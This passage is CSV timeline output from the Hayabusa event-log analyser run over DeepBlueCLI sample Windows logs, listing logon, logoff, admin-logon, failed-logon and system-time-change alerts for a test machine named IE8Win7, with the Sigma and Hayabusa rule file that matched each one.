2013-10-24 04:55:29.463 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x1917f | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:55:29.463 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x19153,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 05:49:57.323 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x1917f,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 05:52:14.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 05:54:11.078 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 05:54:22.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 05:54:23.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 05:54:29.619 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 05:55:00.775 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 05:55:00.775 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x2b15e | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 05:55:00.775 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x2b18a | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 05:55:00.775 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x2b15e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 05:56:36.649 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:05:37.180 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x2b18a,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:06:17.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 06:07:31.859 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:07:33.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 06:07:35.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 06:07:44.487 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:13:38.283 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:13:38.283 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x25519 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:13:38.283 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x2553c | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:13:38.283 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x25519,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:35:27.028 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:50:27.138 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IEUser | Target User: rdavis | IP Address: - | Process: | Target Server: cifs/rdavis-7.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:53:45.841 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: - | Process: C:\Windows\System32\svchost.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:53:45.841 +09:00,IE8Win7,4624,info,,Logon Type 4 - Batch,User: IEUser | Computer: IE8WIN7 | IP Addr: - | LID: 0x15f454,rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:53:45.841 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x15f454,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:53:45.919 +09:00,IE8Win7,4634,info,,Logoff,User: IEUser | LID: 0x15f454,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:53:46.263 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: - | Process: C:\Windows\System32\lsass.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:53:46.263 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x15f53a,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:53:46.669 +09:00,IE8Win7,4634,info,,Logoff,User: IEUser | LID: 0x15f546,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:53:46.669 +09:00,IE8Win7,4634,info,,Logoff,User: IEUser | LID: 0x15f53a,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:54:01.732 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x2553c,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:54:10.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 06:55:25.000 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:55:29.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24
06:55:32.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx 2013-10-24 06:55:35.625 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 06:55:35.625 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0xdad4 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 06:55:35.625 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0xdad4,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 06:55:35.625 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0xdafc | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 06:55:37.450 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 06:55:44.840 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: - | Process: C:\Windows\System32\svchost.exe | Target Server: 
localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 06:55:44.840 +09:00,IE8Win7,4624,info,,Logon Type 4 - Batch,User: IEUser | Computer: IE8WIN7 | IP Addr: - | LID: 0x13dbc,rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 06:55:44.840 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x13dbc,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 07:00:55.356 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0xdafc,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 07:00:55.903 +09:00,IE8Win7,4634,info,,Logoff,User: IEUser | LID: 0xdafc,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 07:00:55.903 +09:00,IE8Win7,4634,info,,Logoff,User: IEUser | LID: 0xdad4,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 07:01:28.840 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 07:01:28.840 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x4bafc,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 07:01:28.840 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x4bafc | 
(Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 07:01:28.840 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x4bb14 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 07:04:16.809 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x4bb14,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 07:04:18.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2013-10-24 07:05:21.859 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 07:05:25.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2013-10-24 07:05:31.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx 2013-10-24 07:05:32.609 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 07:05:32.609 
+09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0xd99e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 07:05:32.609 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0xd99e | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 07:05:32.609 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0xd9c6 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 07:05:36.944 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 07:05:40.928 +09:00,IE8Win7,4624,info,,Logon Type 4 - Batch,User: IEUser | Computer: IE8WIN7 | IP Addr: - | LID: 0x144df,rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 07:05:40.928 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: - | Process: C:\Windows\System32\svchost.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 07:05:40.928 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x144df,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 08:11:15.779 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time 
Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-22 08:29:47.424 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-22 08:32:12.657 +09:00,IE8Win7,4634,info,,Logoff,User: IEUser | LID: 0x144df,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-22 08:34:00.063 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IEUser | Target User: rdavis | IP Address: - | Process: | Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-22 08:40:48.532 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0xd9c6,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-22 08:41:16.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2014-11-22 08:42:34.625 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-22 08:42:37.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2014-11-22 08:42:43.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx 2014-11-22 08:42:49.610 
+09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-22 08:43:06.625 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-22 08:43:06.625 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x16559,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-22 08:43:06.625 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x16559 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-22 08:43:06.625 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x16589 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-22 08:44:23.849 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-22 09:44:32.677 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x16589,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-22 10:43:32.000 +09:00,IE8Win7,6006,info,,Event Log Service 
Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2014-11-24 14:07:26.562 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-24 14:07:37.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2014-11-24 14:07:38.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx 2014-11-24 14:07:42.189 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-24 14:08:08.126 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-24 14:08:08.126 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x2b7c0,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-24 14:08:08.126 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x2b7c0 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-24 14:08:08.126 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | 
Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x2b7f0 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 02:18:43.562 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 02:25:02.877 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 02:48:26.739 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 02:57:33.848 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 03:01:39.454 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 03:02:36.847 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 03:05:40.910 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IEUser | Target User: rdavis | IP Address: - | Process: | Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 06:49:55.313 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time 
Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 06:50:49.109 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x2b7f0,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 06:51:44.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2014-11-26 06:52:36.312 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 06:52:38.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2014-11-26 06:52:41.000 +09:00,IE8WIN7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx 2014-11-26 06:52:48.955 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 06:54:52.158 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 06:54:52.158 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 
